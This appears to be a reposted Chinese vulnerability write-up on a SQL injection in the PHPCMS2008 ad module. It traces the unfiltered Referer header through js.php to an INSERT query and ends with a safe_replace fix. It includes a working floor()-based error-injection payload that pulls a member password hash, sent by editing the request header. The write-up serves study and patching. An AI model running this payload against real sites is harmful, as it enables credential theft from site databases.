function show($placeid)
...
if($adses[0]['option'])
{
foreach($adses as $ads)
{
$contents[] = ads_content($ads, 1);
$this->db->query(“INSERT INTO$this->stat_table(`adsid`,`username`,`ip`,`referer`,`clicktime`,`type`)VALUES (‘$ads[adsid]','$_username','$ip',‘$this->referrer',‘$time',,'0')”);
$template = $ads['template'] ? $ads['template'] : 'ads';
}
}
...

sql語句中

$this->db->query(“INSERT INTO$this->stat_table(`adsid`,`username`,`ip`,`referer`,`clicktime`,`type`)VALUES (‘$ads[adsid]','$_username','$ip',‘$this->referrer',‘$time',,'0')”);

這里$this->referrer通過this方法直接將HTTP請求頭中的referer字段插入到數(shù)據(jù)庫中,沒有做任何過濾措施。(這個this方法是PHPCMS里面直接封裝的)。

所以現(xiàn)在已經(jīng)找到漏洞點，下一步就是找包含漏洞的用戶可控的頁面。如果漏洞是用戶不可控的，比如只能管理員利用，那就相當?shù)碾u肋了。

這里使用回溯的方法，看看哪些頁面調(diào)用了它。

頁面/ads/include/commom.inc.php

<?php 
...
require MOD_ROOT.'include/ads_place.class.php';
require MOD_ROOT.'include/ads.class.php';
...
?>

在往上看看誰調(diào)用了/ads/include/commom.inc.php

/ads/ad.php文件中

<?php
...
require './include/common.inc.php';
...
?>

ad.php文件為用戶可控文件，但ad.php有時不能訪問，繼續(xù)向上查找/data/js.php

<?php
chdir(‘../ads/');
require ‘./ad.php';
?>

在用戶訪問首頁時，會調(diào)用js.php，通過該文件可以提交有害字段，然后通過逐層調(diào)用，傳入字段referer到危險方法show，引入SQL注入攻擊。

02 漏洞利用

修改請求頭中的referer字段的話有很多種，比如burpsuite，Tamper Data…

這里直接使用火狐的Tamper Data進行修改：

點擊Start Tamper,然后訪問http://your-addr/data/js.php?id=1

這時候Tamper Data會跳出來,在右邊框內(nèi)，點擊右鍵，添加一個element值填寫payload

referer=1', (SELECT 1 FROM (select count(*), concat(floor(rand(0)*2),char(45,45,45),(SELECT password from phpcms_member limit 1))a from information_schema.tables group by a)b), ‘0')#

這里我解釋一下：因為漏洞的sql語句是INSERT是不回顯的，所以可以使用盲注，這里的payload使用的floor報錯注入。floor報錯注入原理請參考：floor函數(shù)用法

把這個payload帶入sql語句中是：

$this->db->query(“INSERT INTO$this->stat_table(`adsid`,`username`,`ip`,`referer`,`clicktime`,`type`)VALUES (‘$ads[adsid]','$_username','$ip',‘1',‘$time',(SELECT 1 FROM (select count(*), concat(floor(rand(0)*2),char(45,45,45),(SELECT password from phpcms_member limit 1))a from information_schema.tables group by a)b), ‘0')#,'0')”);

03 漏洞修復(fù)

對相關(guān)字段進行過濾處理。

$referer = safe_replace($this->referer);
$this->db->query("INSERT INTO $this->stat_table (`adsid`, `username`, `ip`, `referer`, `clicktime`, `type`) VALUES ('$ads[adsid]', '$_username', '$ip', '$referer', '$time', '0')");
$template = $ads['template'] ? $ads['template'] : 'ads';

這里safe_replace是PHPCMS2008封裝的過濾函數(shù)。

以上所述是小編給大家介紹的PHPCMS2008廣告模板SQL注入漏洞，希望對大家有所幫助，如果大家有任何疑問請給我留言，小編會及時回復(fù)大家的。在此也非常感謝大家對腳本之家網(wǎng)站的支持！

您可能感興趣的文章: